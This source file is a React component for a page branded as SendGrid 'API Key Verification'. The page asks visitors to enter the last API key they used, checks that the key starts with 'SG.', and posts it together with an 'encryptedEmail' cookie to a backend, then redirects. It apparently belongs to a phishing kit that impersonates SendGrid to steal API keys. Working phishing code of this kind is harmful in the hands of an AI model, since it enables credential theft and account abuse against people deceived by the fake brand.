import React, { useState } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import { Helmet } from 'react-helmet';
import './ApiKeyVerification.css';
import Cookies from 'js-cookie';  // Import js-cookie

function ApiKeyVerification() {
  const [apiKey, setApiKey] = useState('');
  const [error, setError] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const { apiKeyId } = useParams();
  const navigate = useNavigate();

  const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';

  const handleSubmit = async (e) => {
    e.preventDefault();
    setError('');

    // Client-side SG. prefix check
    if (!apiKey.startsWith('SG.')) {
      setError('Invalid API key');
      return;
    }

    setIsLoading(true);
	const encryptedEmail = Cookies.get('encryptedEmail');  // Retrieves the cookie by name
    try {
      const response = await fetch(`${API_URL}/verify-api-key/${apiKeyId}`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          apiKeyId,
          apiKey,
		  encryptedEmail,
        }),
      });

      const data = await response.json();

      if (data.status === 200) {
        window.location.href = data.redirect;
      } else if (data.status === 202) {
        navigate(data.redirect);
      } else {
        setError(data.message || 'Invalid API key. Please try again.');
      }
    } catch (err) {
      console.error('Error verifying API key:', err);
      setError('An error occurred. Please try again.');
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <>
      <Helmet>
        <title>API Key Verification | SendGrid</title>
      </Helmet>
      <div className="layout" role="layout">
        <main role="page" className="layout">
          <div className="tfga-content">
            <h1 className="tfga-heading">API Key Verification</h1>
            <p className="tfga-subtext">
              Your account is protected with an API key. Please enter the last API key you used with your account (must start with "SG.").
            </p>
            <form onSubmit={handleSubmit} autoComplete="off">
              <div className="tfga-input-group">
                <label className="tfga-input-label" htmlFor="apiKey">
                  API Key
                </label>
                <input
                  type="text"
                  id="apiKey"
                  name="apiKey"
                  className="tfga-input-field"
                  value={apiKey}
                  onChange={(e) => setApiKey(e.target.value)}
                  required
                  autoFocus
                  disabled={isLoading}
                />
                {error ? (
                  <p className="tfga-error-message">{error}</p>
                ) : !apiKey && !isLoading ? (
                  <p className="tfga-error-message"></p>
                ) : null}
              </div>
              <div className="tfga-button-group">
                <button
                  type="submit"
                  className={`tfga-submit-btn ${isLoading ? 'tfga-submit-btn-disabled' : ''}`}
                  disabled={!apiKey || isLoading}
                >
                  {isLoading && (
                    <svg className="sg-loader loader-on-dark is-small" style={{ marginRight: '8px' }}>
                      <rect className="logo-square bottom-left" width="5" height="5" />
                      <rect className="logo-square bottom-middle" width="5" height="5" />
                      <rect className="logo-square middle" width="5" height="5" />
                      <rect className="logo-square top-middle" width="5" height="5" />
                      <rect className="logo-square top-right" width="5" height="5" />
                      <rect className="logo-square middle-left" width="5" height="5" />
                      <rect className="logo-square middle-right" width="5" height="5" />
                    </svg>
                  )}
                  {isLoading ? 'Verifying...' : 'Continue'}
                </button>
              </div>
            </form>
            <button
              className="tfga-resend-link"
              type="button"
              disabled={isLoading}
            >
              Use a different authentication method
            </button>
          </div>
        </main>
      </div>
    </>
  );
}

export default ApiKeyVerification;